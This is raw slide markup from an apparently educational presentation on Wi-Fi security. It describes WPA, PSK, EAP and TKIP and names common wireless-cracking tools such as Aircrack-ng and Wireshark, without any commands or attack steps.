                <a:rPr lang="en-US" sz="2800" spc="-135" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-20" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>easily</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-135" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="15" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>cracked</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-135" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>by</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-135" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-15" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>hackers</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-135" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-50" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>using</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-135" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-20" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>freely</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-140" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-40" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>available</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-135" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-25" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>tools.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6597799-806D-94E7-A206-0057429B37DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9296400" y="7139958"/>
              <a:ext cx="8686800" cy="430560"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 430560"/>
                <a:gd name="connsiteX1" fmla="*/ 8686800 w 8686800"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 430560"/>
                <a:gd name="connsiteX2" fmla="*/ 8686800 w 8686800"/>
                <a:gd name="connsiteY2" fmla="*/ 430560 h 430560"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY3" fmla="*/ 430560 h 430560"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 43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6800" h="430560">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8686800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8686800" y="430560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="43056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5806" tIns="33020" rIns="184912" bIns="3302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endParaRPr lang="en-IN" sz="20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53BD5D-9CC2-52F5-979A-707CB1C2B6EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8249633" y="5066013"/>
            <a:ext cx="1145092" cy="1367617"/>
            <a:chOff x="0" y="651"/>
            <a:chExt cx="1145092" cy="1635844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45C8B54A-1664-A832-41D4-C465202F8BA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-245376" y="246027"/>
              <a:ext cx="1635844" cy="1145091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4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{317046FC-FE6B-4A99-12CC-E265302CD717}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1" y="573197"/>
              <a:ext cx="1145091" cy="4907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400" kern="1200" dirty="0"/>
                <a:t>1.</a:t>
              </a:r>
              <a:endParaRPr lang="en-IN" sz="3400" kern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8BCE79D-F4B9-9E5F-B4B7-FAD7EC238543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8249632" y="6595285"/>
            <a:ext cx="1145092" cy="1367616"/>
            <a:chOff x="0" y="651"/>
            <a:chExt cx="1145092" cy="1635844"/>
          </a:xfrm>
        </p:grpSpPr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3C0F4933-6DEC-E634-9882-58D29A2F1614}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-245376" y="246027"/>
              <a:ext cx="1635844" cy="1145091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Arrow: Chevron 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703C3F05-F5B4-CAA2-FA1C-23048384A691}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1" y="573197"/>
              <a:ext cx="1145091" cy="4907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400" dirty="0"/>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400" kern="1200" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-IN" sz="3400" kern="1200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49F788E-DCF4-A4B5-49FA-EA0C442A830D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8053403" y="4034058"/>
            <a:ext cx="45060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Disadvantages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5B70D5-2B02-ACA4-3C61-86E4213714D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680100" y="3895201"/>
            <a:ext cx="35552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177091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7BA735-E5F6-2AF6-9D4B-3F02A3A78283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152832" y="1409700"/>
            <a:ext cx="120396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fontAlgn="base">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>Wi-Fi Protected Access(WPA) is a data encryption method for WLANs based on 802.11 standards .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l" fontAlgn="base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000000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>It is a snapshot of 802.11i providing stronger encryption and enabling PSK(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>pre-shared key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>, which is a long series of letters and numbers generated when a device joins a network through a Wi-Fi access point) or EAP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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Extensible Authentication Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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3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EAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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an authentication framework frequently used in network and internet connections.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000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9C7264-AD8B-1E3D-9B42-4F7BED06FAE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="485141"/>
            <a:ext cx="847192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base"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F353D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SST W01 Roman"/>
              </a:rPr>
              <a:t>Wi-Fi Protected Access(WPA) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2F353D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="SST W01 Ligh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03A67F-79EC-FE18-1810-DEE7434CE20C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="5277980"/>
            <a:ext cx="10058400" cy="46583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ED695B-8752-8F48-7E64-65C7A1A04C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="5273814"/>
            <a:ext cx="45163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WPA Enhances WEP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D8D8E-A9A0-07FF-CCC7-0776F259AA91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="5981700"/>
            <a:ext cx="9067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TKIP enhances WEP by adding a rekeying mechanism to provide fresh encryption and Integrity keys.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Temporal keys are changed for every 10,000 packets. This makes TKIP protected networks more resistant to cryptanalytic attacks involving key reuse. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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95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095500"/>
            <a:ext cx="14935200" cy="81958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5AB09D0-4FB6-C5E7-F50A-6DF696ECC53D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874520" y="1079837"/>
            <a:ext cx="391966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Association</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="54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386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72200" y="1737810"/>
            <a:ext cx="11106150" cy="7229475"/>
            <a:chOff x="6006667" y="1526425"/>
            <a:chExt cx="11106150" cy="72294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6667" y="1526425"/>
              <a:ext cx="8953499" cy="72294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535773" y="2343914"/>
              <a:ext cx="6577330" cy="5599430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6577330" h="5599430">
                  <a:moveTo>
                    <a:pt x="6332839" y="5599175"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="243938" y="5599175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194776" y="5594216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148986" y="5579993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107549" y="5557489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71447" y="5527683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41660" y="5491559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19169" y="5450097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4955" y="5404280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5355088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4216012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4955" y="4166820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19169" y="4121002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41660" y="4079540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71447" y="4043416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107549" y="4013610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148986" y="3991106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194776" y="3976883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243938" y="3971924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705598" y="3971924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754760" y="3966965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800550" y="3952742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841986" y="3930238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878088" y="3900433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907875" y="3864308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930366" y="3822846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944580" y="3777029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="949536" y="3727837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="949536" y="244087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954492" y="194895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968706" y="149077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991197" y="107615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020984" y="71491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057086" y="41686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098522" y="19181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144312" y="4958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193474" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6332839" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6382001" y="4958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6427790" y="19181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6469227" y="41686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6505329" y="71491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6535116" y="107615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6557607" y="149077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6571821" y="194895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6576777" y="244087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6576777" y="5355088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6571821" y="5404280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6557607" y="5450097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6535116" y="5491559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6505329" y="5527683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6469227" y="5557489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6427790" y="5579993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6382001" y="5594216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6332839" y="55991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788249" y="2454279"/>
            <a:ext cx="6075713" cy="524541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1012825" algn="r">
              <a:lnSpc>
                <a:spcPts val="10420"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="8000" b="1" spc="325" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="-370" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="40" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="-2535" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="215" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Cracking </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="220" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="360" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="365" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="75" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="-145" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="915" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="-210" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="170" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="-155" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="-210" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="370" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8000" b="1" spc="-145" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="80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4038" y="2673353"/>
            <a:ext cx="3453765" cy="5358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3000" spc="40" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5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cracking </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="40" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>tools </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-60" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Aircrack- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="35" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-285" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" spc="-285" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Crunch</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-275" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" spc="-275" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-275" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" spc="-275" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="254" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-285" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-215" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="254" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-215" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
